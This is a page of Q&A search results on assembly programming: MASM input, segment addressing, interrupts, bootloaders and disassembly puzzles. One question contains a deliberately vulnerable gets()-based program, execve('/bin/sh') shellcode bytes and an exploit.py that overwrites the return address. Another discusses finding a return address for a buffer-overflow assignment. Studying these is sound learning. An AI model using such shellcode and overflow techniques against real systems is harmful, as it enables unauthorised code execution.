Search Results

Search found 6912 results on 277 pages for 'assembly resolution'.

  • reading a BYTE as a DWORD in Masm

    - by Help I'm in college
    Hi, once again I'm doing MASM programming. I'm trying to write a procedure using the Irvine32 library where the user enters a string which is put into an array of BYTEs with ReadString. Then it loops over that array and determines if each character is a number. However, when I try cmp [buffer + ecx], 30h MASM complains about comparing two things that are not the same size. Is there any way I could read the ASCII code in each BYTE in the array as a DWORD (or otherwise extract the ASCII value in each BYTE)?

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and the NX bit in the BIOS). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code)

    Vulnerable file buffer.s:

        .data
        .fmtsp: .string "Stackpointer %p\n"
        .fmtjump: .string "Jump to %p\n"
        .text
        .global main
        main:
            push %rbp
            mov %rsp, %rbp
            sub $120, %rsp
            # calling printf without setting rax
            # to zero results in a segfault. why?
            xor %rax, %rax
            mov %rsp, %rsi
            mov $.fmtsp, %rdi
            call printf
            mov %rsp, %rdi
            call gets
            xor %rax, %rax
            mov $.fmtjump, %rdi
            mov 8(%rbp), %rsi
            call printf
            xor %rax, %rax
            leave
            ret

    shellcode.s

        .text
        .global main
        main:
            mov $0x68732f6e69622fff, %rbx
            shr $0x8, %rbx
            push %rbx
            mov %rsp, %rdi
            xor %rsi, %rsi
            xor %rdx, %rdx
            xor %rax, %rax
            add $0x3b, %rax
            syscall

    exploit.py

        shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
        stackpointer = "\x7f\xff\xff\xff\xe3\x28"
        output = shellcode
        output += 'a' * (120 - len(shellcode)) # fill buffer
        output += 'b' * 8 # override stored base pointer
        output += ''.join(reversed(stackpointer))
        print output

    Compiled with:

        $ gcc -o buffer buffer.s
        $ gcc -o shellcode shellcode.s

    Started with:

        $ python exploit.py | ./buffer
        Stackpointer 0x7fffffffe328
        Jump to 0x7fffffffe328

  • Address of function is not actual code address

    - by mrjoltcola
    Debugging some code in Visual Studio 2008 (C++), I noticed that the address in my function pointer variable is not the actual address of the function itself. This is an extern "C" function.

        int main() {
            void (*printaddr)(const char *) = &print; // debug shows printaddr == 0x013C1429
        }

        Address: 0x013C4F10
        void print() { ... }

    The disassembly of taking the function address is:

        void (*printaddr)(const char *) = &print;
        013C7465 C7 45 BC 29 14 3C 01 mov dword ptr [printaddr],offset print (13C1429h)

    What am I missing?

  • Questions about "interrupt"

    - by smwikipedia
    Could someone help me clarify the following concepts, and the relationship among them?

        Maskable interrupt
        Unmaskable interrupt
        Hardware interrupt
        Software interrupt
        CPU INTR pin
        the IF bit of the EFlags register

    Some specific questions:

        What's the relationship between Maskable/Unmaskable interrupt and Hardware/Software interrupt?
        What kind of interrupts does the INTR pin detect?
        What kind of interrupts are enabled/disabled by the IF bit of the EFlags register?
        What kind of interrupts need the presence of an interrupt controller?

    Many thanks.

  • How is return address specified in stack?

    - by Mask
    This is what I see from disassembling the statement function(1,2,3);:

        movl $0x3,0x8(%esp)
        movl $0x2,0x4(%esp)
        movl $0x1,(%esp)
        call 0x4012d0 <_Z8functioniii>

    It seems the ret address is not pushed onto the stack at all, then how does ret work?

  • Passing parameters on the stack

    - by oxinabox.ucc.asn.au
    When you pass parameters to a function on the CPU stack, you put the parameters on, then JSR puts the return address on the stack. So that means in your function you must take the top item of the stack (the return address) before you can take the others off. E.g., is the following the correct way to go about it:

        ...
            |Let's do some addition with a function,
            MOVE.L #4, -(SP)
            MOVE.L #5, -(SP)
            JSR add
            |the result of the addition (4+5) is in D0 (9)
        ...
        add:
            MOVE.L (SP)+, A1    |store the return address
                                |in a register
            MOVE.L (SP)+, D0    |get 1st parameter, put in D0
            MOVE.L (SP)+, D2    |get 2nd parameter, put in D2
            ADD.L D2, D0        |add them,
                                |storing the result in D0
            MOVE.L A1, -(SP)    |put the address back on the
                                |Stack
            RTS                 |return

  • Best resource for serious Commodore 64 programming.

    - by postfuturist
    What is the best resource for serious Commodore 64 programming? Assume that serious programming on the Commodore 64 is not done in the BASIC V2 that ships with the Commodore 64. I feel like most of the knowledge is tied up in old books and not available on the internet. All that I have found online are either very beginner style introductions to Commodore 64 programming (Hello world), or arcane demo-coder hacks to take advantage of strange parts of the hardware. I haven't found a well-explained list of opcodes, memory locations for system calls, and general mid-level examples and tips.

    Main portals I have found:

        lemon64
        C-64 Scene Database
        c64web (actually hosted on a Commodore 64!)

    Tools I have found:

        cc65, a C compiler that can target the Commodore 64.

  • Segment register, IP register and memory addressing issue!

    - by Zia ur Rahman
    In the following text I ask two questions and I also describe what I know about these questions so that you can understand my thinking. Your precious comments about the text below are required.

    Below is the detail of the 1st question:

    As we know, if we have one megabyte of memory then we need 20 bits to address this memory. Another thing is that each memory cell has a physical address which is 20 bits wide in 1 MB of memory. The IP register in the iAPX88 is 16 bits. Now my point of view is, we cannot access the memory at all by the IP register, because the memory needs a 20-bit address to be addressed but the IP register is 16 bits. If we have a memory of 64k then the IP register can access this memory, because this memory needs 16 bits to be addressed. But in case of 1 MB of memory, IP can't. Tell me, am I right or not? If not, why? Suppose the physical address of memory is 11000000000000000101. Now how can we access this memory location with 16 bits?

    Below is the detail of the next question:

    My next question is, suppose the IP register is pointing to a memory location, and the segment register is also pointing to a memory location (start of the segment), and the memory is 1 MB: how can we access a memory location by these two 16-bit registers? Tell me the sequence of steps for how the 20-bit addressable memory location is accessed. If your answer is, we take the segment value and we shift it left by 4 bits and then add the IP value into it to get the 20-bit address, then this raises another question about the address bus (the address bus should be 20 bits wide): the registers, both the segment register and the IP register, are 16 bits each, now if the address bus is 20 bits wide then this means that the address bus is connected to both these registers. If that's not the case, then another thing that comes into my mind is that both these registers generate a 20-bit address and there would be a register which can store 20 bits, and this register would be connected to both these registers and the address bus as well.

  • Delay On Assembler?

    - by Norm
    Hey, I want to know how I can do a delay (timer) in 16-bit assembler on a PC. Thank you for helping, Norm.

    OS: Windows

    CODE:

        delay:
            inc bx
            cmp bx,WORD ptr[time]
            je delay2
            jmp delay
        delay2:
            inc dx
            cmp dx,WORD ptr[time2]
            je delay3
            jmp delay
            mov bx,0
        delay3:
            inc cx
            cmp cx,WORD ptr[time3]
            je Finish_delay
            jmp delay

    It's not working well; I need less complicated code.

  • "call" instruction that seemingly jumps into itself

    - by Checkers
    I have gcc 4 compiling some C++ code into the following (from objdump):

        00000030 <func()>:
          30:   55                      push   %ebp
          31:   89 e5                   mov    %esp,%ebp
          33:   56                      push   %esi
          34:   31 f6                   xor    %esi,%esi
          36:   53                      push   %ebx
          37:   bb 00 00 00 00          mov    $0x0,%ebx
          3c:   83 ec 40                sub    $0x40,%esp
          3f:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
          46:   e8 fc ff ff ff          call   47 <func()+0x17>
          4b:   8d 55 ec                lea    0xffffffec(%ebp),%edx
          4e:   89 14 24                mov    %edx,(%esp)
          51:   89 5c 24 04             mov    %ebx,0x4(%esp)
          55:   89 74 24 08             mov    %esi,0x8(%esp)
          59:   89 44 24 0c             mov    %eax,0xc(%esp)
          ; the rest of the function is omitted

    I can't understand the operand of the call instruction here: why does it call into itself, but with one byte off?

  • Programatically detect number of physical processors/cores or if hyper-threading is active on Window

    - by HTASSCPP
    I have a multithreaded C++ application that runs on Windows, Mac and a few Linux flavours. To make a long story short: in order for it to run at maximum efficiency I have to be able to instantiate a single thread per physical processor/core. Creating more threads than there are physical processors/cores degrades the performance of my program considerably. I can already correctly detect the number of logical processors/cores on all three of these platforms. To be able to detect the number of physical processors/cores correctly I'll have to detect if hyper-threading is supported AND active. My question therefore is if there is a way to detect whether hyperthreading is supported AND ENABLED? If so, how exactly?

  • Hello World bootloader not working!

    - by Newbie
    Hello. I've been working through the tutorials on this webpage which progressively create a bootloader that displays Hello World. The 2nd tutorial (where we attempt to get an "A" to be output) works perfectly, and yet the 1st tutorial doesn't work for me at all! (The BIOS completely ignores the floppy disk and boots straight into Windows). This is less of an issue, although any explanations would be appreciated. The real problem is that I can't get the 3rd tutorial to work. Instead of outputting "Hello World", I get an unusual character (and blinking cursor) in the bottom-left corner of the screen. It looks a bit like a smiley face inside a rounded rectangle. Does anyone know how to get Hello World to display as it should?

  • What's the output object file format of GNU assembler as?

    - by smwikipedia
    I have checked the assembler options of the GNU assembler as and I didn't find an option to specify the output object file format. If I am using the following command

        as -o foobar.o foobar.s

    what object file format will I get? The as manual says that "The GNU as can be configured to produce several alternative object file formats." But how? How can I change it to an ELF format? Many thanks.

  • function's return address is different from its supposed value, buffer overflow,

    - by ultrajohn
    Good day everyone! I'm trying to understand how buffer overflow works. I'm doing this for my project in a computer security course I'm taking. Right now, I'm in the process of determining the address of the function's return address which I'm supposed to change to perform a buffer overflow attack. I've written a simple program based on an example I've read on the internet. What this program does is it creates an integer pointer that will be made to point to the address of the function return address in the stack. To do this (granted I understand how a function/program's variables get organized in the stack), I add 8 to the buffer variable's address and set it as the value of ret. I'm not doing anything here that would change the address contained in the location of func's return address. Here's the program:

    Output of the program when it gets executed:

    As you can see, I'm printing the address of the variables buffer and ret. I've added an additional statement printing the value of the ret variable (the supposed location of func's return address, so this should print the address of the next instruction which will get executed after func returns from execution). Here is the dump which shows the supposed address of the instruction to be executed after func returns. (Underlined in green) As you can see, that value is way different from the printed value contained in the variable ret. My question is, why are they different? (Of course under the assumption that what I've done is all right.) Else, what have I done wrong? Is my understanding of the program's runtime stack wrong? Please, help me understand this. My project is due next week and I've barely touched it yet. I'm sorry if I'm being demanding, I badly need your help.

  • assembler - understanding of some lines

    - by user1571682
    With the help of some tutorials, I wrote a little piece of code to display a string after booting from my floppy. My problem now is that I don't understand some lines, where I hope you can help me, or just tell me if I'm right. Code:

        mov ax, 07C0h
        add ax, 288 ; (512 + 4096) / 16 = 288
        mov ss, ax
        mov sp, 4096
        mov ax, 07C0h
        mov ds, ax

    Line by line:

        start the program at the address 07C0h (could I change this?)
        Add space for 288 paragraphs to ax?
        Space of 4096 bytes for my program (to store variables and stuff?)
        Go to the start address?

    Thanks for your help.

  • Far jump in ntdll.dll's internal ZwCreateUserProcess

    - by user49164
    I'm trying to understand how the Windows API creates processes so I can create a program to determine where invalid exes fail. I have a program that calls kernel32.CreateProcessA. Following along in OllyDbg, this calls kernel32.CreateProcessInternalA, which calls kernel32.CreateProcessInternalW, which calls ntdll.ZwCreateUserProcess. This function goes:

        mov eax, 0xAA
        xor ecx, ecx
        lea edx, dword ptr [esp+4]
        call dword ptr fs:[0xC0]
        add esp, 4
        retn 0x2C

    So I follow the call to fs:[0xC0], which contains a single instruction:

        jmp far 0x33:0x74BE271E

    But when I step this instruction, Olly just comes back to ntdll.ZwCreateUserProcess at the add esp, 4 right after the call (which is not at 0x74BE271E). I put a breakpoint at retn 0x2C, and I find that the new process was somehow created during the execution of add esp, 4. So I'm assuming there's some magic involved in the far jump. I tried to change the CS register to 0x33 and EIP to 0x74BE271E instead of actually executing the far jump, but that just gave me an access violation after a few instructions. What's going on here? I need to be able to delve deeper beyond the abstraction of this ZwCreateUserProcess to figure out how exactly Windows creates processes.

  • Order of the [BITS 16] and [ORG 0x0000] directives

    - by dboarman-FissureStudios
    I am beginning some experimentation in writing a kernel and having fun doing it. I have the basic boot-loader done and the following directives:

        [BITS 16]
        [ORG 0x0000]

    In the kernel tutorial, however, it starts with:

        [ORG 0x0000]
        [BITS 16]

    I was wondering if the order in which these directives are given makes a difference? I am using NASM version 2.06rc2, OpenSUSE 11.2

  • GCC emits extra code for boost::shared_ptr dereference

    - by Checkers
    I have the following code:

        #include <boost/shared_ptr.hpp>

        struct Foo {
            int a;
        };

        static int A;

        void func_shared(const boost::shared_ptr<Foo> &foo) {
            A = foo->a;
        }

        void func_raw(Foo * const foo) {
            A = foo->a;
        }

    I thought the compiler would create identical code, but for the shared_ptr version an extra, seemingly redundant instruction is emitted.

        Disassembly of section .text:

        00000000 <func_raw(Foo*)>:
           0:   55                      push   ebp
           1:   89 e5                   mov    ebp,esp
           3:   8b 45 08                mov    eax,DWORD PTR [ebp+8]
           6:   5d                      pop    ebp
           7:   8b 00                   mov    eax,DWORD PTR [eax]
           9:   a3 00 00 00 00          mov    ds:0x0,eax
           e:   c3                      ret
           f:   90                      nop

        00000010 <func_shared(boost::shared_ptr<Foo> const&)>:
          10:   55                      push   ebp
          11:   89 e5                   mov    ebp,esp
          13:   8b 45 08                mov    eax,DWORD PTR [ebp+8]
          16:   5d                      pop    ebp
          17:   8b 00                   mov    eax,DWORD PTR [eax]
          19:   8b 00                   mov    eax,DWORD PTR [eax]
          1b:   a3 00 00 00 00          mov    ds:0x0,eax
          20:   c3                      ret

    I'm just curious, is this necessary, or is it just an optimizer's shortcoming? Compiling with g++ 4.1.2, -O3 -NDEBUG.

  • Read a buffer of unknown size (Console input)

    - by Sanarothe
    Hi. I'm a little behind in my X86 Asm class, and the book is making me want to shoot myself in the face. The examples in the book are insufficient and, honestly, very frustrating because of their massive dependencies upon the author's link library, which I hate. I wanted to learn ASM, not how to call his freaking library, which calls more of his library. Anyway, I'm stuck on a lab that requires console input and output. So far, I've got this for my input:

        input PROC
            INVOKE ReadConsole, inputHandle, ADDR buffer, Buf - 2, ADDR bytesRead, 0
            mov eax,OFFSET buffer
            Ret
        input EndP

    I need to use the input and output procedures multiple times, so I'm trying to make it abstract. I'm just not sure how to use the data that is set to eax here. My initial idea was to take that string array and manually crawl through it by adding 8 to the offset for each possible digit (Input is integer, and there's a little bit of processing) but this doesn't work out because I don't know how big the input actually is. So, how would you swap the string array into an integer that could be used?

    Full code: (Haven't done the integer logic or the instruction string output because I'm stuck here.)

        include c:/irvine/irvine32.inc
        .data
        inputHandle HANDLE ?
        outputHandle HANDLE ?
        buffer BYTE BufSize DUP(?),0,0
        bytesRead DWORD ?
        str1 BYTE "Enter an integer:",0Dh, 0Ah
        str2 BYTE "Enter another integer:",0Dh, 0Ah
        str3 BYTE "The higher of the two integers is: "
        int1 WORD ?
        int2 WORD ?
        int3 WORD ?
        Buf = 80
        .code
        main PROC
            call handle
            push str1
            call output
            call input
            push str2
            call output
            call input
            push str3
            call output
            call input
        main EndP
        larger PROC
            Ret
        larger EndP
        output PROC
            INVOKE WriteConsole
            Ret
        output EndP
        handle PROC USES eax
            INVOKE GetStdHandle, STD_INPUT_HANDLE
            mov inputHandle,eax
            INVOKE GetStdHandle, STD_INPUT_HANDLE
            mov outputHandle,eax
            Ret
        handle EndP
        input PROC
            INVOKE ReadConsole, inputHandle, ADDR buffer, Buf - 2, ADDR bytesRead, 0
            mov eax,OFFSET buffer
            Ret
        input EndP
        END main
